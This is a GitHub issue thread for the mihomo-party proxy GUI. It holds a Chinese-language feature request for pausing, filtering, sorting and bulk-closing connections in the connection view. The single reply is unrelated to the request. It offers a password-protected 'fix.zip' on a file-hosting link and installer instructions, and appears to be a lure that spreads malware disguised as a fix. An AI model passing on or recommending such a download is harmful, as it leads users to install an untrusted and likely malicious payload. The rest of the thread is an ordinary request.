### ISSUE TITLE
[Feature] 高级连接视图功能

### ISSUE THREAD

**Issue by wjfu99** [pompurin404/mihomo-party#89]
### Verify steps

- [X] 我已在标题简短的描述了我所需的功能
- [X] 我已在[Issue Tracker](./?q=is%3Aissue)中寻找过,但未找到我所需的功能
- [X] 这是向GUI程序提出的功能请求,而不是内核程序
- [x] 我未在最新的测试版本找到我所需的功能

### 操作系统

MacOS

### 描述

较 #65 更进一步，希望增加对连接视图的暂停、筛选、排序和打断功能。

### 特性说明
1. 暂停连接的自动刷新，方便观察连接状态
2. 希望针对源IP，目标IP，Host，协议（TCP/UDP/ICMP等），源端口，目标端口等常用配置的筛选功能，如果有可能可以在筛选界面展示当前的已有连接的可选项，方便快速选择。
<img width="698" alt="image" src="https://github.com/user-attachments/assets/1ae7a27c-8b0b-4162-b545-8985dedb9deb">（CFW界面）

3. 希望怎加对实时上传/下载速度，总上传/下载量，连接保持时间的排序
4. 希望增加对已筛选连接的一键打断功能

### 使用场景示例
例如在保持SSH连接（目标端口22的TCP连接）状态下，希望更改所有HTTPS网页浏览连接（目标端口443的TCP连接）对应的代理节点从A到B，此时需要分为以下步骤实现：
1. 更换代理节点从A至B
2. 筛选符合条件（目标端口443）的连接
3. 一键打断筛选出来的连接
如果该特性未部署，则需要手动浏览所有连接，逐一关闭这些连接，这在连接数众多的情况下操作繁杂。而如果选择点击关闭所有连接，则SSH等其他连接也会一并打断，造成使用不便。

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
